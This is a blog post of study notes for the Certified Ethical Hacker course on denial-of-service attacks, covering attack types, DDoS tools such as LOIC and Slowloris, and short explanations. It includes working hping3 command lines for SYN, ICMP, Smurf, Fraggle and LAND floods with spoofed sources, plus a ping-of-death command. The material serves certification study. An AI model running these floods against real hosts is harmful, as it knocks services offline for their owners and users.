Posted on by Glenn

[ Certified Ethical Hacker v10 ] :: [ Chapter 10 cont’d] :: Denial of Service

Chapter 10 Continued: Denial of Service

What It Looks Like

Digital Attack Map:
https://digitalattackmap.com/#anim=1&color=0&country=ALL&list=0&time=18400&view=map

The VLS DDoS Attack, visualized with ApachePong / Logstalgia:
https://www.youtube.com/watch?v=hNjdBSoIa8k
https://logstalgia.io

Low Orbit Ion Cannon: a classic DDoS tool:

Low Orbit Ion Cannon
Low Orbit Ion Cannon

https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon

DoS Attack Types

  1. Fragmentation
  2. Volumetric
  3. Application
  4. TCP state-exhaustion

Example DoS Attacks

  • SYN attack
  • SYN flood
  • ICMP flood
  • Smurfing
  • Ping of Death
  • Teardrop
  • LAND attack
  • Peer to Peer
  • Permanent

DDoS Tools

  • Trinity
  • Tribe Flood Network
  • RUDY
  • Slowloris

Types of Attacks

Service request flood

Simply make millions of page requests, for instance. See the effects:
https://www.youtube.com/watch?v=hNjdBSoIa8k

SYN attack/flood:

hping3 -i u1 -S -p 80 <target ip>

S = SYN flag, -p 80 = port 80, -i u1 = interval, 1 microsecond

ICMP floods

These include Smurfing, ICMP flooding and ping flooding.

A simple ICMP flood:

hping3 -1 --flood -a <target ip> <broadcast ip>

Ping of Death (note that this no longer works)

From a Windows machine:

ping -l 65500 <target ip> -w 1 -n 1

Teardrop attack

This involves fragmenting a packet but mis-matching the numbers where the segments should meet (the fragment offset).

Amplification attacks, which include:

Smurf attack

hping3 --icmp --spoof <target ip> <broadcast ip>

Fraggle attack

hping3 --udp --spoof <target ip> <broadcast ip>

LAND attack (Local Area Network Denial)
(no modern network is susceptible to this attack)

hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source <target ip>

https://en.wikipedia.org/wiki/LAND

Permanent DoS attacks

Phlashing is flashing malicious code to BIOS or any other firmware location. For most people, this is irrecoverable.

Application-level attacks

Flooding the network

Disrupting services, for instance the login service by making lots of failed attempts so that users get locked out

Jamming the network, usually by crafting SQL that locks or corrupts a database